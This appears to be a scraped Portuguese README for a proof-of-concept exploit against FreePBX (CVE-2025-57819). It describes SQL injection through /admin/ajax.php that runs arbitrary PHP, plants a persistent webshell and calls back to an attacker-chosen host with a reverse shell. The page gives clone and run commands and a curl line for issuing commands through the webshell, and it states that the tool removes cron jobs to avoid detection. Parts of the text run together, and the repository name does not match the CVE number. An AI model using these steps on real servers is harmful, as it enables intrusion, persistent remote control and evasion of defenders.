
Exploit de prova de conceito para CVE-2025-57819 no FreePBX: injeção de SQL na API AJAX para executar PHP arbitrário, criar um webshell persistente e acionar um reverse shell.
Este script explora uma vulnerabilidade em versões do FreePBX anteriores à 16.0.26.0 (CVE-2025-57819), permitindo que atacantes remotos executem código PHP arbitrário por meio de uma falha de injeção de SQL no endpoint da API AJAX. O exploit cria tanto um webshell quanto uma reverse shell acionada automaticamente.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: Instância FreePBX alvo (ex.: https://freepbx.example.com)-lhost LHOST: Seu IP para o callback da reverse shell-lport LPORT: Porta para a conexão da reverse shellpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
Após a exploração bem-sucedida, acesse o webshell via:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
O exploit remove automaticamente os cron jobs após a execução para evitar detecção.
-- para comentar a sintaxe SQL restante/var/www/html/